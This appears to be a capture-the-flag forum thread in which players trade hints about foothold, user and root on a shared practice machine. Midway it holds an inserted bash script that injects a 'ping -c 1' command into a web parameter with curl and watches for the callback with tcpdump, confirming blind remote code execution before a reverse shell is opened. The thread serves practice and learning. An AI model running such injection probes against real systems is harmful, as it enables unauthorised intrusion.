I'm lost on the priv esc to root. I thought the issue was going to be something "wild" with the "extraction" or something down the wrong binary "path", but I cannot get either of those two attack vectors to work correctly. I also cannot locate the "script" that is actually doing any of this, so my attempts are blind. Where did I go wrong?
EDIT: Got it. Thanks, @DaChef's comment pointed me in the right direction. If you cannot get wild, maybe you can have it look someplace else.
As some people say in this thread, it is necessary to search the login page, but it is not necessary to use Hydra or brute-force the password; what you are looking for is in the Blackhat HS…
User:
Actually I could not with the initial flag, but maybe it could be trying, trying and trying…? Or maybe you have to search for "something" on the server that allows me to be G** (any hint?)
Root:
I saw this escalation method on another machine; it's all about looking for an unusual file on the server. Using a privilege escalation enumeration script, you'll notice something strange.
The initial foothold and getting user eat most of the time. Getting user is more of a struggle than root. Also, with all the resets on the free server, maintaining a shell was tough.
Overall, an okay-ish machine. In the end, I learned something new. PM for hints if needed.
It took me quite a while to finish this box, mostly because I got very fed up with the constant resets and having to go through all the steps to get a shell again… Even on VIP, this kind of ruined the fun for me.
The initial steps of the box aren't that realistic, but overall it's still pretty educational, as it touches several techniques and there are different ways of getting root.
For foothold & user: make sure you enumerate the website properly. The site isn't actually big and what you're looking for stands out a lot, so this really shouldn't be an issue. Then use the hint that was given earlier regarding "being evil". Then continue enumerating.
For root: there is something going on in your home folder (which is pretty easy to find, as your home folder isn't so big). Find out what's triggering it, go through it properly and think of ways to exploit it.
Anyone care to answer a question about the initial foothold? I'm 99.9% sure I know where I'm supposed to be looking, but it won't work… I have reset the box too.
@hray & @iCk: read the POC and understand it, then just try getting RCE in various ways. Always start with the command PING IP, since it has no special characters and you can confirm you have RCE with it (tcpdump for ping on your local host). Once you get ping to work, you know you have RCE and can work on a shell from there. I'm not 100% sure, but I think if you do ping without -c 1 it hangs the server, so better to add that just in case, so you don't have to revert. I also believe the webshells spawned hang the server as well, resulting in all the reverts.
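The "ping first, shell later" check from the post above, written out as an added example; it is not code from the thread, the box or any PoC it refers to. The target URL, the injectable parameter name, the injection separator, the attacker address and interface, and the target address are all hypothetical placeholders that you must set yourself. The listener needs root for tcpdump.

```shell
#!/usr/bin/env bash
# Added example (not from the thread): confirm blind command injection with an
# ICMP callback. All URLs, parameter names and addresses below are placeholders.
set -u

# Build the probe. "ping -c 1 <ip>" contains no shell metacharacters, and -c 1
# makes it terminate, so a blocking target process does not hang the server.
probe_cmd() {
    printf 'ping -c 1 %s' "$1"
}

# Prepend whatever separator the PoC needs to break out of the original command
# (for example ';' or '|'); leave it empty if the parameter reaches a shell directly.
inject_payload() {
    local prefix="$1" ip="$2"
    printf '%s%s' "$prefix" "$(probe_cmd "$ip")"
}

# Wait up to $3 seconds for one ICMP echo request from the target on interface $1.
# Exit status 0 means a ping arrived (RCE confirmed); non-zero means timeout.
wait_for_ping() {
    local iface="$1" target_ip="$2" secs="$3"
    timeout "$secs" tcpdump -ni "$iface" -c 1 \
        "icmp[icmptype] = icmp-echo and src host $target_ip" >/dev/null 2>&1
}

# Start the listener, fire one request with the injected probe, then report.
confirm_rce() {
    local url="$1" param="$2" prefix="$3" lhost="$4" target_ip="$5" iface="$6"
    wait_for_ping "$iface" "$target_ip" 10 &
    local listener=$!
    sleep 1   # let tcpdump attach before the request goes out
    curl -s -m 15 -G --data-urlencode "$param=$(inject_payload "$prefix" "$lhost")" \
        "$url" >/dev/null
    if wait "$listener"; then
        echo "[+] ICMP echo from $target_ip received: command execution confirmed"
        return 0
    fi
    echo "[-] no ping within 10s: wrong injection context, egress filtered, or no RCE"
    return 1
}

# Usage with placeholder values (hypothetical target):
#   ./rce_ping_check.sh 'http://TARGET/vuln.php' cmd ';' 10.10.14.5 10.10.10.20 tun0
if [ "$#" -eq 6 ]; then
    confirm_rce "$@"
fi
```

Only once the echo request shows up is it worth spending a revert on a reverse shell; until then every failure is either the injection context or egress filtering, and the ping probe isolates which.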
@cpazzolin said:
I think someone put the root and user flag readable for everyone
…
Now that I get the box, I understand that this is one of the great defects of this box. I'm sure that many, like me, will end up getting the flag effortlessly because of this.
Given that the machines are shared, it's to be expected. Whenever I get root trivially, I always revert and try to exploit again, just to be sure I got it the intended way. If not, then I'll know once I revert, and I can give it a go without "an assist".
Yeah, I always take great care to reset boxes when I finish if I do something messy like that.
Can someone help me with the privesc? I am really trying to be wild, but it is not working for me. If possible, I want to discuss my findings so far. I really appreciate clarifications. Thanks.
@madcap said: @Sh11td0wn I'm already logged in as g******. I'm stuck on the second step; tried RCE based on a known vuln, but it's not working.
Start simpler and work your way up. If you actually read the article, it basically walks you through it step by step. If all you do is copy and paste, and skip steps to try to jump straight to a reverse shell, you're more likely to screw something up, and it's much harder to debug and find your errors.